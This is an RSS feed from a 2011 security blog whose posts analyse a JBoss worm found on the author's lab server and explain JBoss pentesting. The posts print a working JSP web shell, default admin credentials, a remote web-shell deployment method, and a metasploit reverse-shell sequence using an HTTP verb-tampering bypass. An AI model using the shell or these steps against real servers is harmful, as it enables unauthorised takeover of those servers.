<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Goats Uncovered</title>
	<atom:link href="http://scoperchiatore.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://scoperchiatore.wordpress.com</link>
	<description>Security, Developing, Pentest, Vulns, News...</description>
	<lastBuildDate>Fri, 16 Dec 2011 08:50:03 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='scoperchiatore.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://0.gravatar.com/blavatar/6be11d0c9f78a2621a967f08d3a66421?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>Goats Uncovered</title>
		<link>http://scoperchiatore.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://scoperchiatore.wordpress.com/osd.xml" title="Goats Uncovered" />
	<atom:link rel='hub' href='http://scoperchiatore.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Jboss Worm &#8211; It is real and there are 3 new form spreading  #in #jboss #worm</title>
		<link>http://scoperchiatore.wordpress.com/2011/12/16/jboss-worm-it-is-real-and-there-are-3-new-form-spreading-in-jboss-worm/</link>
		<comments>http://scoperchiatore.wordpress.com/2011/12/16/jboss-worm-it-is-real-and-there-are-3-new-form-spreading-in-jboss-worm/#comments</comments>
		<pubDate>Fri, 16 Dec 2011 08:50:01 +0000</pubDate>
		<dc:creator>scoperchiatore</dc:creator>
				<category><![CDATA[backdoor]]></category>
		<category><![CDATA[info]]></category>
		<category><![CDATA[jboss]]></category>
		<category><![CDATA[worm]]></category>

		<guid isPermaLink="false">http://scoperchiatore.wordpress.com/?p=177</guid>
		<description><![CDATA[During last two weeks, I exposed my lab towards a public IP. I have Jboss4/6 on it and some more things, and today I noticed something I didn&#8217;t deploy&#8230;: Directory of C:\jboss\server\default\deploy\management ../../2011 11:41 &#60;DIR&#62; . ../../2011 11:41 &#60;DIR&#62; .. ../../2010 04:10 &#60;DIR&#62; console-mgr.sar ../../2011 20:29 &#60;DIR&#62; iddqd.war ../../2011 23:09 &#60;DIR&#62; idssvc.war ../../2011 18:55 &#60;DIR&#62; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=177&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>During last two weeks, I exposed my lab towards a public IP. I have Jboss4/6 on it and some more things, and today I noticed something I didn&#8217;t deploy&#8230;:</p>
<pre>Directory of C:\jboss\server\default\deploy\management
../../2011 11:41 &lt;DIR&gt; .
../../2011 11:41 &lt;DIR&gt; ..
../../2010 04:10 &lt;DIR&gt; console-mgr.sar
../../2011 20:29 &lt;DIR&gt; iddqd.war
../../2011 23:09 &lt;DIR&gt; idssvc.war
../../2011 18:55 &lt;DIR&gt; iesvc.war
../../2010 04:26 &lt;DIR&gt; web-console.war
../../2011 22:22 &lt;DIR&gt; wstats.war
../../2011 19:07 &lt;DIR&gt; zecmd.war</pre>
<p>This is a default Jboss dir, where you should find only web-console .war and console-mgr.sar; as you can see, someone has added something else&#8230; <strong>This server had a (strong) password</strong>, so I think they used a 0day or the HTTP Verb Jboss vuln (HEAD use of the jmx-console) Starting from the first one, iddqd.war; it is a simple war, with only one jsp with the very same name:</p>
<pre>Directory of C:\jboss\server\default\deploy\management\iddqd.war
../../2011 20:29 &lt;DIR&gt; .
../../2011 20:29 &lt;DIR&gt; ..
../../2011 16:44 630 iddqd.jsp
1 File(s) 630 bytes</pre>
<p>iddqd.jsp is a simple java web-shell (x.x.x.22 is my server)</p>
<div class="wp-caption alignnone" style="width: 542px"><img title="iddqd.jsp" src="http://scoperchiatore.files.wordpress.com/2011/12/1_iddqd_net_stat_.png?w=532&#038;h=600" alt="" width="532" height="600" /><p class="wp-caption-text">iddqd.jsp running net statistics</p></div>
<p>Here is the source, it&#8217;s a very straightforward JSP shell:</p>
<pre>&lt;%@ page import="java.util.*,java.io.*"%&gt; &lt;% %&gt; &lt;HTML&gt;&lt;BODY&gt; &lt;FORM METHOD="GET" NAME="comments" ACTION=""&gt; 
&lt;INPUT TYPE="text" NAME="comment"&gt; &lt;INPUT TYPE="submit" VALUE="Send"&gt; &lt;/FORM&gt; &lt;pre&gt; 
&lt;% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "&lt;BR&gt;");
 Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream();
 InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); 
while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %&gt; 
&lt;/pre&gt; &lt;/BODY&gt;&lt;/HTML&gt;</pre>
<p>All wars are built the same: there is the xxx directory (where xxx is the name of the war, as zecmd) and its corresponding jsp (zecmd.jsp), so on my server now there are 5 Java backdoors:</p>
<pre>http://x.x.x.22/zecmd/zecmd.jsp

http://x.x.x.22/wstats/wstats.jsp

http://x.x.x.22/iddqd/iddqd.jsp

http://x.x.x.22/idssvc/idssvc.jsp

http://x.x.x.22/iesvc/iesvc.jsp</pre>
<p>After discovering this, I started wonder: why do you need to upload 5 webshells?? If you are a &#8220;human&#8221;, you would surely prefer one stable webshell&#8230;  <strong>This is where I googled for iddqd.jsp</strong>, and here comes the surprise&#8230; Everything seems to link this jsp to the infamous and not well known (for me) <span><span style="color:#ff0000;">Jboss worm</span>; here there a great and detailed analysis I found, and I can confirm this is the behavior if the infection is successful: </span></p>
<p><a href="http://eromang.zataz.com/2011/10/25/jboss-worm-analysis-in-details/">http://eromang.zataz.com/2011/10/25/jboss-worm-analysis-in-details/</a></p>
<p>&nbsp;</p>
<p>Try just google for<strong> iddqd.jsp</strong> /<strong> wstats.jsp</strong> (last one is less common&#8230;) and you&#8217;ll find a third form, <strong>zmeu/zmeu.jsp</strong></p>
<h4><span style="color:#3366ff;">I found no references explicit linking the Jboss worm to <span style="text-decoration:underline;">wstats.jsp</span>, <span style="text-decoration:underline;">zmeu.jsp</span> and <span style="text-decoration:underline;">iddqd.jsp</span> , so I assume those are 3 new &#8220;form&#8221; of this &#8220;worm&#8221;.</span></h4>
<p>Dorking for those jsp usage could give you an idea on how many sites have this worm/shell on!!!</p>
<p>You can even find issued commands (perl+a.pl or pscan) in the status history:</p>
<p><a href="http://www.google.com/search?q=zmeu.jsp">http://www.google.com/search?q=zmeu.jsp</a></p>
<p><a href="http://www.google.com/search?q=iddqd.jsp">http://www.google.com/search?q=iddqd.jsp</a></p>
<p><a href="http://www.google.com/search?q=%22wstats.jsp%22">http://www.google.com/search?q=%22wstats.jsp%22</a></p>
<p><a href="http://www.google.com/search?q=%22iesvc.jsp%22">http://www.google.com/search?q=%22iesvc.jsp%22</a></p>
<p><a href="http://www.google.com/search?q=%22zecmd.jsp%22">http://www.google.com/search?q=%22zecmd.jsp%22</a></p>
<p><a href="https://www.google.com/search?q=%22idssvc.jsp%22">http://www.google.com/search?q=%22idssvc.jsp%22</a></p>
<p>There are at leat 200 unique URLs indexed by Google (my lab isn&#8217;t, and I suppose many infected Jboss) that seems to be infected</p>
<p>It is spreading right now (i.e in my lab <strong>wstats.jsp</strong> has been uploaded yesterday, 15 Dec); while it is not as serious as other worm, It can target critical application and infrastructures, due to the fact that no one uses Jboss for &#8220;simple company site&#8221;, usually.</p>
<br />Filed under: <a href='http://scoperchiatore.wordpress.com/category/backdoor/'>backdoor</a>, <a href='http://scoperchiatore.wordpress.com/category/info/'>info</a>, <a href='http://scoperchiatore.wordpress.com/category/jboss/'>jboss</a>, <a href='http://scoperchiatore.wordpress.com/category/worm/'>worm</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/scoperchiatore.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/scoperchiatore.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/scoperchiatore.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/scoperchiatore.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/scoperchiatore.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/scoperchiatore.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/scoperchiatore.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/scoperchiatore.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/scoperchiatore.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/scoperchiatore.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/scoperchiatore.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/scoperchiatore.wordpress.com/177/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/scoperchiatore.wordpress.com/177/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/scoperchiatore.wordpress.com/177/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=177&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://scoperchiatore.wordpress.com/2011/12/16/jboss-worm-it-is-real-and-there-are-3-new-form-spreading-in-jboss-worm/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db09a17b2f81cf798114fd74579afa3d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">scoperchiatore</media:title>
		</media:content>

		<media:content url="http://scoperchiatore.files.wordpress.com/2011/12/1_iddqd_net_stat_.png" medium="image">
			<media:title type="html">iddqd.jsp</media:title>
		</media:content>
	</item>
		<item>
		<title>CLSHACK &#8211; Simple keylogger with xinput</title>
		<link>http://scoperchiatore.wordpress.com/2011/11/23/clshack-simple-keylogger-with-xinput/</link>
		<comments>http://scoperchiatore.wordpress.com/2011/11/23/clshack-simple-keylogger-with-xinput/#comments</comments>
		<pubDate>Wed, 23 Nov 2011 17:33:03 +0000</pubDate>
		<dc:creator>scoperchiatore</dc:creator>
				<category><![CDATA[info]]></category>

		<guid isPermaLink="false">http://scoperchiatore.wordpress.com/?p=165</guid>
		<description><![CDATA[Here http://www.clshack.it/linux-xinput-simple-keylogger.html, they say xinput does need root privilege to read chars; so they build a keylogger exploiting this &#8220;feature&#8221; Cool, very smart, but is this an xinput implementation bug, or is a X (Xorg/Xfree) design bug? It could be disastrous if it applies to ALL Unix&#8230; Filed under: info<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=165&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Here <a href="http://www.clshack.it/linux-xinput-simple-keylogger.html">http://www.clshack.it/linux-xinput-simple-keylogger.html</a>, they say xinput does need root privilege to read chars; so they build a keylogger exploiting this &#8220;feature&#8221;</p>
<p>Cool, very smart, but is this an xinput implementation bug, or is a X (Xorg/Xfree) design bug? It could be disastrous if it applies to ALL Unix&#8230;</p>
<br />Filed under: <a href='http://scoperchiatore.wordpress.com/category/info/'>info</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/scoperchiatore.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/scoperchiatore.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/scoperchiatore.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/scoperchiatore.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/scoperchiatore.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/scoperchiatore.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/scoperchiatore.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/scoperchiatore.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/scoperchiatore.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/scoperchiatore.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/scoperchiatore.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/scoperchiatore.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/scoperchiatore.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/scoperchiatore.wordpress.com/165/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=165&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://scoperchiatore.wordpress.com/2011/11/23/clshack-simple-keylogger-with-xinput/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db09a17b2f81cf798114fd74579afa3d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">scoperchiatore</media:title>
		</media:content>
	</item>
		<item>
		<title>Jboss Pentesting &amp; HTTP Verbal Tampering</title>
		<link>http://scoperchiatore.wordpress.com/2011/11/22/jboss-pentesting-http-verbal-tampering/</link>
		<comments>http://scoperchiatore.wordpress.com/2011/11/22/jboss-pentesting-http-verbal-tampering/#comments</comments>
		<pubDate>Tue, 22 Nov 2011 21:44:15 +0000</pubDate>
		<dc:creator>scoperchiatore</dc:creator>
				<category><![CDATA[info]]></category>

		<guid isPermaLink="false">http://scoperchiatore.wordpress.com/?p=151</guid>
		<description><![CDATA[It is about 2-3 months I pentest Jboss &#38; Tomcat&#8230;There are some issue I think can be useful to exploit Jboss. First of all, as any application server, you can totally own the server by getting into the application server admin console. You&#8217;ll have 2 way to do this: weak password exploiting Jboss has 2 [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=151&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>It is about 2-3 months I pentest Jboss &amp; Tomcat&#8230;There are some issue I think can be useful to exploit Jboss. First of all, as any application server, you can totally own the server by getting into the application server admin console. You&#8217;ll have 2 way to do this:</p>
<ul>
<li>weak password</li>
<li>exploiting</li>
</ul>
<p>Jboss has 2 kind of admin console: the first one, the oldest one, is the jmx-console, ie http://localhost:8080/jmx-console/</p>
<p>and the second one, from Jboss 5.5 or similar http://localhost:8080/admin-console/</p>
<p>Jboss has quite always an Information Leakage page, very useful to debug your tries http://localhost:8080/status?full=true</p>
<div></div>
<div>Then you can find another console http://localhost:8080/web-console/ This is only an informational-one, because it uses the JMX Console to deploy and doing things&#8230; so there is no &#8220;straight-way&#8221; to use it, even if there are some interesting aspects to analyze</div>
<div></div>
<div>
<p><strong>Weak Passwords</strong></p>
<p><strong></strong>Jboss 4 has no password for jmx-console; on Jboss&gt;4 , there are some default password, usually admin/admin</p>
<p>If you can read files, point to</p>
<p><strong>server\default\deploy\jmx-console.war\WEB-INF\classes\jmx-console-users.properties</strong></p>
<p>and you&#8217;ll have an easy own.</p>
<p><strong>Deploying a Webshell</strong></p>
<p><strong></strong>To deploy something, you&#8217;ll have 3 choiches</p>
<ol>
<li>metasploit, with 3 sub-choiches</li>
<ol>
<li><a href="http://www.metasploit.com/modules/exploit/multi/http/jboss_maindeployer">http://www.metasploit.com/modules/exploit/multi/http/jboss_maindeployer</a></li>
<li><a href="http://www.metasploit.com/modules/exploit/multi/http/jboss_bshdeployer">http://www.metasploit.com/modules/exploit/multi/http/jboss_bshdeployer</a></li>
<li><a href="http://www.metasploit.com/modules/exploit/multi/http/jboss_deploymentfilerepository">http://www.metasploit.com/modules/exploit/multi/http/jboss_deploymentfilerepository</a></li>
</ol>
<li>the daytona pack, that is a self-running version of those metasploit-exploits <a href="http://www.exploit-db.com/exploits/17977/">http://www.exploit-db.com/exploits/17977/</a></li>
<li>the manual way</li>
</ol>
<p>With metasploit, it is better to deploy a meterpreter, as usual. The daytona pack will provide you with a reverse shell.</p>
<p>Manually, you can check many thins as explained here: <a href="http://lab.mediaservice.net/notes_more.php?id=JBOSS_more">http://lab.mediaservice.net/notes_more.php?id=JBOSS_more</a></p>
<p>To upload a webshell manually, the best way is</p>
<ul>
<li>get a domain/webspace on a web server and upload your webshell (for example wsh4jboss.war, but mine is an old-fashioned-style webshell</li>
<li>go to http://localhost:8080/jmx-console/ -&gt;look for<strong>DeploymentScanner</strong> -&gt; look for <strong>addURL()</strong> -&gt; put your <strong>http://mydomain/wsh4jboss.war</strong> here, then Invoke</li>
<li>NOTE: it is a quick way to do this, but it will continuously load the war from mydomain, so you can run out of bandwidth</li>
<li>to undeploy, http://localhost:8080/jmx-console/ -&gt;jboss.web.deployment -&gt; find your shell -&gt; click -&gt; stop() and/or destroy()</li>
</ul>
<p>Why the &#8220;manual&#8221; way? Because if daytona/metasploit fails, it is not always unexploitable :)</p>
<p><strong>HTTP Verbal Tampering</strong></p>
<p><strong></strong>You can do everything with a JMX-Console password (or if your jmx-console does not has a password); but if you can&#8217;t get it?</p>
<p>So, do you know what HTTP Verbal Tampering is? (I think this is the Fortify name). Every web application J2EE has a WEB-INF\web.xml file; it says many things (audit it when you pentest/code review!!), but we need to the security-constraint section:</p>
<pre><strong><span style="color:#3366ff;">&lt;security-constraint&gt; </span></strong>
<strong><span style="color:#3366ff;"> &lt;web-resource-collection&gt; &lt;web-resource-name&gt;<span style="color:#000000;">HtmlAdaptor</span>&lt;/web-resource-name&gt;</span></strong>
<strong><span style="color:#3366ff;"> <em>    &lt;description&gt;An example security config that only allows users with </em></span></strong>
<strong><span style="color:#3366ff;"><em> the role JBossAdmin to access the HTML JMX console web application</em> <em>&lt;/description&gt;</em></span></strong>
<strong><span style="color:#3366ff;"> <em></em> &lt;url-pattern&gt;<span style="color:#000000;">/*</span>&lt;/url-pattern&gt;</span></strong>
<strong><span style="color:#3366ff;"> &lt;http-method&gt;</span>GET<span style="color:#3366ff;">&lt;/http-method&gt;</span></strong>
<strong><span style="color:#3366ff;"> &lt;http-method&gt;</span>POST<span style="color:#3366ff;">&lt;/http-method&gt;</span></strong>
<strong><span style="color:#3366ff;"> &lt;/web-resource-collection&gt; </span></strong>
<strong><span style="color:#3366ff;"> &lt;auth-constraint&gt;&lt;role-name&gt;<span style="color:#000000;">JBossAdmin</span>&lt;/role-name&gt;&lt;/auth-constraint&gt;</span></strong>
<strong><span style="color:#3366ff;">&lt;/security-constraint&gt;</span></strong></pre>
<p>So, let&#8217;s understand this XML Piece; what does it says? If you read documentation, you&#8217;ll discover that what the comment says is false. This piece of XML says &#8220;<em>To access  HtmlAdaptor/* by GET or POST, you have to be member of the JBossAdmin group</em>&#8220;. What does not says is &#8220;<em>To access  HtmlAdaptor/* by HEAD, PUT, DELETE, MODIFY, OPTIONS and TRACE, you does not need to be in any group</em>&#8220;</p>
<p>What can you do with HEAD/PUT/&#8230;.? In Java every servlet (HTMLAdaptor is the main JMX-Console servlet) needs to implement doGet(&#8230;) doPost(&#8230;) doPut(&#8230;) method to serve for a specific HTTP Verb; a JSP, instead, can answer to any Verb, so a JSP is less secure than a servlet. So it is very unlikely you will modify any file or put a file on the AS&#8230;</p>
<p>But HEAD is like GET, except for the fact you&#8217;ll not see the outpu &#8211;&gt; some requests to the jmx-console can be done with HEAD &#8211;&gt; this is the &#8220;Jboss exploitation tecnique&#8221;</p>
<p>With metasploit, any of the previous mode support the modification of the Verbal HTTP:</p>
<pre>msf &gt; <strong>use exploit/multi/http/jboss_maindeployer</strong>
<strong></strong>msf exploit(jboss_maindeployer) &gt; set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(jboss_maindeployer) &gt; set LHOST [MY IP ADDRESS]
msf exploit(jboss_maindeployer) &gt; set RHOST [TARGET IP]
msf exploit(jboss_maindeployer) &gt; <strong>set VERB HEAD</strong>
<strong></strong>msf exploit(jboss_maindeployer) &gt; <strong>exploit</strong></pre>
<p>Remember to check the /status?full=true page ;)</p>
</div>
<br />Filed under: <a href='http://scoperchiatore.wordpress.com/category/info/'>info</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/scoperchiatore.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/scoperchiatore.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/scoperchiatore.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/scoperchiatore.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/scoperchiatore.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/scoperchiatore.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/scoperchiatore.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/scoperchiatore.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/scoperchiatore.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/scoperchiatore.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/scoperchiatore.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/scoperchiatore.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/scoperchiatore.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/scoperchiatore.wordpress.com/151/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=151&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://scoperchiatore.wordpress.com/2011/11/22/jboss-pentesting-http-verbal-tampering/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db09a17b2f81cf798114fd74579afa3d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">scoperchiatore</media:title>
		</media:content>
	</item>
		<item>
		<title>Vendors, Disclosure and Patching problems &#8211; an open letter by IT Security Geeks</title>
		<link>http://scoperchiatore.wordpress.com/2011/11/14/vendors-disclosure-and-patching-problems-an-open-letter-by-it-security-geeks/</link>
		<comments>http://scoperchiatore.wordpress.com/2011/11/14/vendors-disclosure-and-patching-problems-an-open-letter-by-it-security-geeks/#comments</comments>
		<pubDate>Mon, 14 Nov 2011 08:12:54 +0000</pubDate>
		<dc:creator>scoperchiatore</dc:creator>
				<category><![CDATA[info]]></category>

		<guid isPermaLink="false">http://scoperchiatore.wordpress.com/?p=139</guid>
		<description><![CDATA[When I read this link, AN OPEN LETTER TO SOFTWARE VENDORS I lived a well-known story I saw many times&#8230;  I totally agree with them, and I would like to add some word to their letter: @hdmoore linked the Rapid7 Disclosure policy: 60 days as maximum time given to the Vendor to patch&#8230; they are many, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=139&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>When I read this link,</p>
<h2><a title="Permanent Link to An Open Letter to Software Vendors" href="http://www.itsecuritygeeks.com/news/an-open-letter-to-software-vendors/" rel="bookmark">AN OPEN LETTER TO SOFTWARE VENDORS</a></h2>
<p>I lived a well-known story I saw many times&#8230;  I totally agree with them, and I would like to add some word to their letter:</p>
<p><a href="https://twitter.com/#!/hdmoore">@hdmoore</a> linked the <a href="http://www.rapid7.com/disclosure.jsp">Rapid7 Disclosure policy</a>: 60 days as maximum time given to the Vendor to patch&#8230; they are many, in a working environment. If you need more time to fix a &#8220;standard&#8221; vuln (memory corruption, sql injection, XSS, RFI, &#8230;) please re-think one of your process: do you develop bad code, with too many security bugs? Do you not undertake a correct Risk Analisys? Is your Incident Team too slow to address the issue after the Security Researcher/Consultant/Pentester submitted the bug?</p>
<p>&nbsp;</p>
<p>Dear vendor,</p>
<p>until your Development Processes + Incident Handling Teams/Process + Risk Analisys &amp; Management Structures will not communicate and will not see themselves as interrelating structures, you will not get even closer to real security. Your &#8220;quick&#8221; response (2-3 months or even a year!) is <em><strong>inappropriate</strong></em> to this new world.</p>
<p>Bad guys have twitter to share vulns in 15 minutes; they google your watermarks to find your product deployed on small or big companies! Small sites/companies are attacked for anonymization, DDOS, find customer&#8217;s data, spam, phishing, &#8230; and big ones can be totally owned for you vulns.</p>
<p>Yes, bad guys can own a company because of your bugs: just think about it, if I have found a big issue in only 5 days, what could an &#8220;armed&amp;dangerous&#8221; team do in 3 months? And why will they target you? Who knows, perhaps because one day someone will look at you old-fashioned-web1.0-app, with no ajax and few css support, and will start thinking &#8220;how old this one is?&#8221;&#8230;</p>
<p>Please, stop thinking &#8220;I have reviewed my policies/processes 4 years ago, they are ok&#8221;&#8230; No, they&#8217;re not, 4 years ago no one used twitter or FB or google+ like today. 4 years ago cloud services waere pioneristic! 4 years ago there were not Stuxnet or DuQu, integrated malaware with extensive capabilities.</p>
<p>You have to rethink yourself as attackers became more powerful, and world goes on&#8230; If you think about it now, you have time to do big changes that will lead to a more secure state, if you continue delaying, please believe me when I say that tomorrow could be too late for your business</p>
<p>Kind Regards</p>
<p>A Senior Security Consultant</p>
<br />Filed under: <a href='http://scoperchiatore.wordpress.com/category/info/'>info</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/scoperchiatore.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/scoperchiatore.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/scoperchiatore.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/scoperchiatore.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/scoperchiatore.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/scoperchiatore.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/scoperchiatore.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/scoperchiatore.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/scoperchiatore.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/scoperchiatore.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/scoperchiatore.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/scoperchiatore.wordpress.com/139/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/scoperchiatore.wordpress.com/139/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/scoperchiatore.wordpress.com/139/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=139&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://scoperchiatore.wordpress.com/2011/11/14/vendors-disclosure-and-patching-problems-an-open-letter-by-it-security-geeks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db09a17b2f81cf798114fd74579afa3d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">scoperchiatore</media:title>
		</media:content>
	</item>
		<item>
		<title>OWASP Mantra &#8211; Pentest (Chrome) Browser project</title>
		<link>http://scoperchiatore.wordpress.com/2011/11/13/owasp-mantra-pentest-chrome-browser-project/</link>
		<comments>http://scoperchiatore.wordpress.com/2011/11/13/owasp-mantra-pentest-chrome-browser-project/#comments</comments>
		<pubDate>Sun, 13 Nov 2011 14:06:53 +0000</pubDate>
		<dc:creator>scoperchiatore</dc:creator>
				<category><![CDATA[info]]></category>

		<guid isPermaLink="false">http://scoperchiatore.wordpress.com/?p=135</guid>
